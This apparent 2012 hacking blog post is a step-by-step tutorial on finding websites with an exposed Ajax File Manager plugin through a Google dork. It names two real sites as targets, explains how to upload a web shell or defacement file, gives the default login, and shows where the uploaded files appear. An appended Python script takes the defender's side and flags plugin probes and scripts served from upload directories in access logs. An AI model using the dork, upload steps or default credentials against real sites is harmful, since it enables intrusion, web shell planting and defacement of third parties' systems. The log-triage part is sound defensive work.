Wednesday, August 29, 2012

Ajax File Manager ~ Shell and Files Upload Vulnerability

Open the Google search engine and type this dork: inurl:/plugins/ajaxfilemanager/
For example, I got:

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/

or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any other site ...
Now put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in the URL.


For example:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now find Upload and upload your shell/deface/file.


To view your file, find the /Uploaded/ directory on the website by using your brain :P


Example of an uploaded file: http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites




Results : 


If you need to log in to any ajaxfilemanager:


Default password for Ajax File Manager
Username: ajax
Password: 123456
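
On the defending side, requests to the plugin path and scripts served out of an uploaded/ directory stand out in web server access logs. The following is an added example, not part of the original post: it triages Combined Log Format lines per client; the sample log lines, tag names and extension list are constructed assumptions.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Plugin path as it appears in the URLs on this page.
PLUGIN = re.compile(r'/plugins/ajaxfilemanager/', re.I)
# Assumption: extensions this server would execute; adjust to your handlers.
SCRIPT_IN_UPLOADS = re.compile(
    r'/uploaded/[^?]*\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def triage(lines):
    """Return {client_ip: sorted list of finding tags} for access-log lines."""
    findings = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, method, path, status = m.groups()
        ok = status.startswith("2")
        if SCRIPT_IN_UPLOADS.search(path):
            if ok:  # a script under the upload directory was actually served
                findings[ip].add("script-served-from-uploads")
        elif PLUGIN.search(path):
            if not ok:
                findings[ip].add("manager-probe")      # scanning for the plugin
            elif method == "POST":
                findings[ip].add("manager-post")       # upload or login attempt
            else:
                findings[ip].add("manager-reachable")  # exposed to this client
    return {ip: sorted(tags) for ip, tags in findings.items()}

# Constructed sample log lines (documentation IP ranges, made-up paths).
T = "[29/Aug/2012:10:01:02 +0000]"
P = "/tiny_mce/plugins/ajaxfilemanager"
SAMPLE_LOG = [
    f'203.0.113.7 - - {T} "GET {P}/ajaxfilemanager.php HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.7 - - {T} "POST {P}/ajaxfilemanager.php HTTP/1.1" 200 310 "-" "-"',
    f'203.0.113.7 - - {T} "GET {P}/uploaded/a.php?x=1 HTTP/1.1" 200 12 "-" "-"',
    f'198.51.100.9 - - {T} "GET /cms{P}/ajaxfilemanager.php HTTP/1.1" 404 209 "-" "-"',
    f'192.0.2.5 - - {T} "GET /index.php HTTP/1.1" 200 1000 "-" "-"',
]

if __name__ == "__main__":
    for ip, tags in triage(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

Any "manager-reachable" hit from outside the editing staff's network means the file manager is exposed without access control, and "script-served-from-uploads" means the upload directory allows script execution.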
